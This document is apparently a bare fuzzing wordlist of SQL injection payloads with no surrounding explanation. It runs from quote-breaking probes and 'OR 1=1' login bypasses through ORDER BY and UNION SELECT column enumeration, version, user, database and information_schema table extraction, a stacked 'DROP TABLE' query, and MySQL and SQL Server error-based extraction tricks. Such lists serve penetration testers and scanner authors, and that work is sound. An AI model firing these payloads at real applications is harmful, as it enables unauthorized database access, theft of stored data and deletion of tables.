'
"
`
')
")
`)
' OR '1'='1
' OR '1'='1'--
' OR '1'='1'#
' OR '1'='1'/*
" OR "1"="1
" OR "1"="1"--
' OR 1=1--
' OR 1=1#
' OR 1=1/*
admin'--
' AND 1=1--
' AND 1=2--
' OR ''='
' OR 'x'='x
1' ORDER BY 1--
1' ORDER BY 10--
1' ORDER BY 100--
1 ORDER BY 1--
1 ORDER BY 10--
1 UNION SELECT NULL--
1 UNION SELECT NULL,NULL--
1 UNION SELECT NULL,NULL,NULL--
1 UNION SELECT NULL,NULL,NULL,NULL--
1 UNION SELECT NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL--
1' UNION SELECT 1,2,3--
1' UNION SELECT 1,2,3,4--
1' UNION SELECT 1,2,3,4,5--
' UNION SELECT @@version--
' UNION SELECT version()--
' UNION SELECT user()--
' UNION SELECT database()--
' UNION SELECT table_name FROM information_schema.tables--
1; SELECT 1--
1'; DROP TABLE test--
' AND EXTRACTVALUE(1,CONCAT(0x7e,VERSION()))--
' AND UPDATEXML(1,CONCAT(0x7e,VERSION()),1)--
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(VERSION(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
' AND EXP(~(SELECT * FROM (SELECT VERSION())a))--
' OR GTID_SUBSET(CONCAT(0x7e,VERSION()),1)--
' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7e,VERSION())) USING utf8)))--
' AND 1=CONVERT(int,(SELECT TOP 1 @@version))--
') OR ('1'='1
')) OR (('1'='1
